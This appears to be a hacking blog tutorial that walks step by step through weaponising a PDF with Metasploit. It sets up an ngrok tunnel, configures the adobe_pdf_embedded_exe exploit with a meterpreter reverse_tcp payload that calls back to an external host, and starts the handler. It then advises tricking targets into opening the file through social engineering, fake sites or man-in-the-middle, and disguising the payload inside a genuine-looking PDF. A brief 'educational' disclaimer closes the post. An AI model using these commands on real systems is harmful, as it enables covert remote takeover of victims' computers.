Welcome back to hacking a rise i am the laughing man the one and only laughing man i am him whoop whoop so in this post we will be showing you now to take over a pc with a pdf file there is a load ways we can do this but im going to show you the most simple was with msfconsole on kali linux or parrot you know what any linux system with metasploit installed lol all the commands in msfconsole are the same so fuck it lets start
What is metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7
find out more here
how to perform the hack
Right lad and gals to start the hack i will be using ngrok for forward my ports via ssh you can get ngrok free by download it of there site
ngrok download here
so first of all we need to stat postgresql services you can do this by typing in terminal service postgresql start 
now we can start ngrok to run on tcp so in terminal type ./ngrok tcp 4444 this will open the port 4444 for are payload to connect on
as u see the port is now open if you dont wanna use ngrok we have serveo or forward the ports via router follow this link https://www.lifewire.com/how-to-port-forward-4163829
Now we are ready to start msfconsole so open a new terminal and leave the one with ngrok open if u are using ngrok or serveo starting msfconsole may take some time depending on your system
as u see its loaded
now we type search type:exploit platform:windows adobe pdf if you dont know the command to use the exploit
there a lot i know
as i use the exploit 100 times before i can just type exploit/windows/fileformat/adobe_pdf_embedded_exe and press y to let it load as i always forget to put use before the exploit lol
now we type show options this will show use what input we need to add for this to work annd here we will set the name the pdf file and the payload that we will be using so type out this set FILENAME ELITEHACKINGGUIDE.PDF so now we type show options agen to see whats next
now we type set PAYLOAD windows/meterpreter/reverse_tcp
now we need to set the lhost and the lport for the payload to connect back to so we type set LHOST 0.tcp.ngrok.io and the LPORT 17140 as u see im using the link and port ngrok gave us for opening port 4444 (note you can add the serveo link or your ip in to the lhost and the port you have open )
now for the fun type exploit or run
as u see the file is saves in .msf4 file
how to get target to download pdf
There are many of ways we can get are target to download the file like beef-xss,man in the middle,upload it to a file hosting site or make a fake site and run it of your pc/laptop or phone to lure the target to download it social engineering is key in this sort of attack then agen most attacks we need good SE skills as we dont want the target to know we are hacking them but saying that we can embed the payload to a pdf file we got online by typing set INFILENAME /root/Documents/hackingpdfs/web-hacking-101.pdf
compared to the first pdf we used we now have it looking more like a real pdf file
now we need to start the handler for the payload so type this
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.tcp.ngrok.io
set LPORT 17140
now all we have to do is get the target to download the pdf and boom we have them hahahahaha i dont got a windows laptop here so i cant show you it connected and im not going to get some to download it after all we are white hats now black hats lol
DISCLAMER
This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.